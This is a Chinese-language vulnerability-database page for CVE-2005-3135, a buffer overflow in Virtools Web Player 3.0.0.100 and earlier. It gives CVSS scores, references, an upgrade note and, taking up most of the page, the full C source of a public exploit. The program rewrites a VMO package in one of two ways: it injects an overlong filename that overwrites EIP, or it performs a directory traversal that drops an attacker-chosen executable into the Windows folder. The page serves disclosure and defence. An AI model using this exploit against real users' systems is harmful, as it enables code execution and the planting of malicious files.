CVE-2005-3135
CVSS7.5
发布时间 :2005-10-04 18:02:00
修订时间 :2016-10-17 23:33:01
NMCOE    

[原文]Buffer overflow in Virtools Web Player 3.0.0.100 and earlier allows remote attackers to execute arbitrary code via a long filename.


[CNNVD]Virtools Web Player缓冲区溢出漏洞(CNNVD-200510-003)

        Virtools Web Player是virtools导出到网页所需要的播放器
        Virtools Web Player 3.0.0.100及之前版本存在缓冲区溢出,远程攻击者可以通过长文件名执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3135
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-3135
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200510-003
(官方数据源) CNNVD

- 其它链接及资源

http://aluigi.altervista.org/adv/virtbugs-adv.txt
(VENDOR_ADVISORY)  MISC  http://aluigi.altervista.org/adv/virtbugs-adv.txt
http://marc.info/?l=bugtraq&m=112811771331997&w=2
(UNKNOWN)  BUGTRAQ  20050930 Buffer-overflow and directory traversal bugs in Virtools Web Player
http://securitytracker.com/id?1014993
(UNKNOWN)  SECTRACK  1014993
http://www.securityfocus.com/bid/14990
(UNKNOWN)  BID  14990

- 漏洞信息

Virtools Web Player缓冲区溢出漏洞
高危 缓冲区溢出
2005-10-04 00:00:00 2005-10-20 00:00:00
远程  
        Virtools Web Player是virtools导出到网页所需要的播放器
        Virtools Web Player 3.0.0.100及之前版本存在缓冲区溢出,远程攻击者可以通过长文件名执行任意代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1239)

Virtools Web Player <= 3.0.0.100 Buffer Overflow DoS Exploit (EDBID:1239)
windows dos
2005-10-02 Verified
0 Luigi Auriemma
N/A [点击下载]
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#ifdef WIN32
    #include <io.h>

    typedef unsigned char   u_char;
    typedef unsigned int    u_int;
    #define ftruncate   chsize
#else
    #include <unistd.h>
    #include <sys/types.h>
#endif



#define VER     "0.1"
#define SIGN    "Nemo"
#define FILE1   "components"
#define FILE2   "objects"
#define FMT     "%-10u"
#define EIP     "\xde\xc0\xad\xde"
#define BOF     "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" \
                "aa" EIP
#define BOFFILE "Nemo il pesce scemo"



u_int putfile(FILE *fdout, char *fname);
void std_err(void);



struct {
    u_char  sign[4];
    u_int   unknown1;   // 0x694620
    u_int   crc;        // ???
    u_int   unknown2;   // big-endian sdk version?
    u_int   plugin1;
    u_int   plugin2;
    u_int   unknown3;   // 12
    u_int   compcsz;
    u_int   objcsz;
    u_int   objsz;
    u_int   addpath;    // ???
    u_int   components;
    u_int   objects;
    u_int   zero;       // ???
    u_int   version;
    u_int   compsz;
} vmo;



int main(int argc, char *argv[]) {
    FILE    *fd;
    u_int   i,
            len,
            off;
    int     attack;
    u_char  fname[512],
            *vmofile,
            *addfile,
            *addpath;


    setbuf(stdout, NULL);

    fputs("\n"
        "Virtools <= 3.0.0.100 buffer-overflow and directory traversal bugs "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <attack> <file.VMO>\n"
            "\n"
            "Attack:\n"
            " 1 = buffer-overflow\n"
            " 2 = directory traversal, is needed to specify also the file to add and the\n"
            "     special path for exploiting the bug\n"
            "\n"
            "Example: virtbugs 1 tintoys.vmo\n"
            "Example: virtbugs 2 tintoys.vmo malicious.exe ..\\..\\..\\..\\windows\\runme.pif\n"
            "Note:    will be replaced only the latest file in the package\n"
            "Note:    if you need a quick VMO file use the following:\n"
            "           http://www.virtools.com/downloads/vmo/Tintoys/tintoys.vmo"
            "\n", argv[0]);
        exit(1);
    }

    attack  = atoi(argv[1]);
    vmofile = argv[2];

    if((attack != 1) && (attack != 2)) {
        fputs("\nError: wrong attack number chosen\n\n", stdout);
        exit(1);
    }

    printf("- open VMO file:    %s\n", vmofile);
    fd = fopen(vmofile, "r+b");
    if(!fd) std_err();

    if(!fread(&vmo, sizeof(vmo), 1, fd)) std_err();
    off = ftell(fd);

    if(memcmp(vmo.sign, SIGN, sizeof(vmo.sign))) {
        printf("- file seems invalid, its sign is: %.*s\n",
            sizeof(vmo.sign), vmo.sign);
    }

    printf(
        "  Informations and files list:\n"
        "- components:       %u\n"
        "- objects:          %u\n"
        "- version:          %hhu.%hhu.%hhu.%hhu\n"
        "\n",
        vmo.components,
        vmo.objects,
        (vmo.version >> 24) & 0xff, (vmo.version >> 16) & 0xff,
        (vmo.version >> 8)  & 0xff, vmo.version & 0xff);

    fputs(
        "  inSize     outSize    Filename\n"
        "  ------------------------------\n", stdout);

    printf("  "FMT" "FMT" %s\n", vmo.compcsz, vmo.compsz, FILE1);
    printf("  "FMT" "FMT" %s\n", vmo.objcsz,  vmo.objsz,  FILE2);
    if(fseek(fd, off + vmo.compcsz + vmo.objcsz, SEEK_SET) < 0) std_err();

    for(i = 2; ; i++) {
        if(!fread(&len, 4, 1, fd)) break;
        off = ftell(fd) - 4;
        if(!fread(fname, len, 1, fd)) break;

        if(len > (sizeof(fname) - 1)) break; // checks
        fname[len] = 0;
        if(!*fname) break;

        if(!fread(&len, 4, 1, fd)) break;
        printf("             "FMT" %s\n", len, fname);

        if(fseek(fd, len, SEEK_CUR) < 0) std_err();
    }

    if(i <= 2) {
        fputs("\n"
            "Error: your VMO file doesn't contain additional files so cannot be modified\n"
            "       try with another\n"
            "\n", stdout);
        exit(1);
    }

    fseek(fd, off, SEEK_SET);

    if(attack == 1) {
        fputs("\n- buffer-overflow bug exploitation\n", stdout);
        len = sizeof(BOF) - 1;
        fwrite(&len, 4, 1, fd);
        fwrite(BOF, len, 1, fd);

        len = sizeof(BOFFILE) - 1;
        fwrite(&len, 4, 1, fd);
        fwrite(BOFFILE, len, 1, fd);

    } else if(attack == 2) {
        fputs("\n- directory traversal bug exploitation\n", stdout);
        if(argc < 5) {
            fputs("\nError: you must specify also <your_file> and <bad_path>\n\n", stdout);
            exit(1);
        }
        addfile = argv[3];
        addpath = argv[4];

        len = strlen(addpath);
        fwrite(&len, 4, 1, fd);
        fwrite(addpath, len, 1, fd);

        len = putfile(fd, addfile);
    }

    fflush(fd);
    if(ftruncate(fileno(fd), ftell(fd)) < 0) std_err();
    fflush(fd);
    fclose(fd);
    printf("- added a file of %u bytes\n", len);
    return(0);
}



u_int putfile(FILE *fdout, char *fname) {
    struct stat xstat;
    FILE    *fdin;
    u_int   len,
            tot = 0;
    u_char  buff[1024];

    fdin = fopen(fname, "rb");
    if(!fdin) std_err();
    fstat(fileno(fdin), &xstat);

    fwrite(&xstat.st_size, 4, 1, fdout);

    while((len = fread(buff, 1, sizeof(buff), fdin))) {
        fwrite(buff, len, 1, fdout);
        tot += len;
    }

    fclose(fdin);
    return(tot);
}



void std_err(void) {
    perror("\nError");
    exit(1);
}

// milw0rm.com [2005-10-02]
		

- 漏洞信息

19815
Virtools Web Player Filename Processing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A remote overflow exists in Virtools Web Player. The application fails to perform proper bounds checking resulting in a buffer overflow. With a specially crafted file containing an overly long filename, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2005-09-30 Unknow
2005-09-30 Unknow

- 解决方案

Upgrade to version 3.0.0.101 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站